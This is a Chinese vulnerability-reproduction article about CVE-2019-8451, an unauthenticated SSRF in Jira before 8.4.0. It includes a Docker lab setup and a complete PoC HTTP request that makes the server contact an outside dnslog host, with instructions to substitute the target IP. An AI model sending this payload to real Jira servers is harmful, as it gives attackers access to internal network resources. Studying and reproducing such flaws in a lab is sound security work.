您好,登录后才能下订单哦!
这期内容当中小编将会给大家带来有关Jira未授权SSRF产生CVE-2019-8451漏洞复现的示例分析,文章内容丰富且以专业的角度为大家分析和叙述,阅读完这篇文章希望大家可以有所收获。
0x00 简介
JIRA是Atlassian公司出品的项目与事务跟踪工具,被广泛应用于缺陷跟踪、客户服务、需求收集、流程审批、任务跟踪、项目跟踪和敏捷管理等工作领域。
0x01 漏洞概述
Jira的/plugins/servlet/gadgets/makeRequest资源存在SSRF漏洞,原因在于JiraWhitelist这个类的逻辑缺陷,成功利用此漏洞的远程攻击者可以以Jira服务端的身份访问内网资源。经分析,此漏洞无需任何凭据即可触发。(来自奇安信CERT)
0x02 影响范围
Jira < 8.4.0
0x03 环境搭建
在线靶场
开放时间(当前-9月29日20:00)
获取方式(完成任意一个):
1、将本文转发至朋友圈并配文字,截图发至公众号内
2、联系作者,五元红包
自行搭建
使用docker进行搭建,执行以下命令开启环境
docker pull cptactionhank/atlassian-jira:7.8.0
docker run --detach --publish 8080:8080 cptactionhank/atlassian-jira:7.8.0
访问ip:8080进行安装
下图选择第二个
继续即可
点击next,后面漏了两张图
去生成JIRA使用许可证
生成之后找到License Key,回到页面填上License Key继续安装
至此,安装完毕。
0x04 漏洞利用
先访问ip:8080,然后刷新抓包
将数据包替换为如下Poc:
GET /plugins/servlet/gadgets/makeRequest?url=http://192.168.198.133:8080@bgkwd5.dnslog.cn HTTP/1.1Host: 192.168.198.133:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeReferer: http://192.168.198.133:8080/secure/Dashboard.jspaX-Atlassian-Token: no-checkContent-Length: 2
其中ip替换为目标ip,共三处
@后面改为你的dnslog的地址
repeater发包
去dnslog中刷新查看结果,可以看到有流量经过
如果访问未开放端口,结果是这样的:
上述就是小编为大家分享的Jira未授权SSRF产生CVE-2019-8451漏洞复现的示例分析了,如果刚好有类似的疑惑,不妨参照上述分析进行理解。如果想知道更多相关知识,欢迎关注亿速云行业资讯频道。
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。